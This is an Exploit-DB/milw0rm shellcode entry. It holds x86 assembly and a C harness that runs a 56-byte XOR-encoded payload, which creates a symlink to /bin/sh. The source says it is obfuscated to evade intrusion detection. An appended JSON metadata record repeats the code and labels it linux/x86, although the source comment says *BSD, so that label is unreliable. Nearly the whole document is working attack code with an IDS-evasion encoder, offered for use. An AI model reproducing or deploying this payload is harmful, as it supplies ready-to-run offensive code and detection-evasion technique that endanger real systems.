/*The shellcode calls the symlink() and makes the
link to the /bin/sh in the current dir.
short version with anti IDS xoring
size = 56 bytes
OS = *BSD
written by /rootteam/dev0id (www.sysworld.net)
dev0id@uncompiled.com
BITS 32
jmp short callme
main:
pop esi
xor ecx,ecx
mov cl,32
main_loop:
xor byte [esi+ecx],0x0f
loop main_loop
xor byte [esi+ecx],0x0f
push esi
ret
callme:
xored_shellcode:
call main
db 0xe4,0x1d,0x51,0x3e,0xcf,0x87,0x49,0x08,0x82,0x51,0x0a,0x5c,0x82,0x11,0x5c
db 0xbf,0x36,0x5f,0xc2,0x8f,0xe7,0xe6,0xf0,0xf0,0xf0,0x20,0x6d,0x66,0x61,0x20
db 0x7c,0x67
*/
char shellcode[] =
"\xeb\x11\x5e\x31\xc9\xb1\x20\x80\x34\x0e\x0f\xe2\xfa\x80\x34"
"\x0e\x0f\x56\xc3\xe8\xea\xff\xff\xff\xe4\x1d\x51\x3e\xcf\x87"
"\x49\x08\x82\x51\x0a\x5c\x82\x11\x5c\xbf\x36\x5f\xc2\x8f\xe7"
"\xe6\xf0\xf0\xf0\x20\x6d\x66\x61\x20\x7c\x67";
int
main (void)
{
void (*code)(void);
code=(void(*)())shellcode;
(void)code();
return 0;
}
// milw0rm.com [2004-09-26]
{"published": "2004-09-26T00:00:00", "id": "EDB-ID:13426", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "a88c57f0db2c1b872a37df5b9cbe8f66c4a032d933a00a9acf608fe545f0982f", "description": "linux/x86 symlink /bin/sh xoring 56 bytes. Shellcode exploit for lin_x86 platform", "type": "exploitdb", "osvdbidlist": [], "lastseen": "2016-02-01T17:54:12", "edition": 1, "title": "linux/x86 symlink /bin/sh xoring 56 bytes", "href": "https://www.exploit-db.com/exploits/13426/", "modified": "2004-09-26T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://www.exploit-db.com/download/13426/", "references": [], "reporter": "dev0id", "sourceData": "/*The shellcode calls the symlink() and makes the \r\n link to the /bin/sh in the current dir.\r\n\tshort version with anti IDS xoring\r\n size = 56 bytes\r\n OS = *BSD\r\n \twritten by /rootteam/dev0id (www.sysworld.net)\r\n\t\t\t\tdev0id@uncompiled.com\r\nBITS 32\r\njmp short\tcallme\r\nmain:\r\n\tpop\tesi\r\n\txor\tecx,ecx\r\n\tmov\tcl,32\r\nmain_loop:\r\n\txor byte\t[esi+ecx],0x0f\r\n\tloop\tmain_loop\r\n\txor byte\t[esi+ecx],0x0f\r\n\tpush\tesi\r\n\tret\t\r\ncallme:\r\nxored_shellcode:\r\n\tcall\tmain\r\n\tdb 0xe4,0x1d,0x51,0x3e,0xcf,0x87,0x49,0x08,0x82,0x51,0x0a,0x5c,0x82,0x11,0x5c\r\n\tdb 0xbf,0x36,0x5f,0xc2,0x8f,0xe7,0xe6,0xf0,0xf0,0xf0,0x20,0x6d,0x66,0x61,0x20\r\n\tdb 0x7c,0x67\r\n\t\r\n*/\r\n\r\nchar shellcode[] =\r\n\t\"\\xeb\\x11\\x5e\\x31\\xc9\\xb1\\x20\\x80\\x34\\x0e\\x0f\\xe2\\xfa\\x80\\x34\"\r\n\t\"\\x0e\\x0f\\x56\\xc3\\xe8\\xea\\xff\\xff\\xff\\xe4\\x1d\\x51\\x3e\\xcf\\x87\"\r\n\t\"\\x49\\x08\\x82\\x51\\x0a\\x5c\\x82\\x11\\x5c\\xbf\\x36\\x5f\\xc2\\x8f\\xe7\"\r\n\t\"\\xe6\\xf0\\xf0\\xf0\\x20\\x6d\\x66\\x61\\x20\\x7c\\x67\";\r\n\r\nint\r\nmain (void)\r\n{\r\n\tvoid (*code)(void);\r\n\tcode=(void(*)())shellcode;\r\n\t(void)code();\r\n\treturn 0;\r\n}\n\n// milw0rm.com [2004-09-26]", "objectVersion": "1.0"}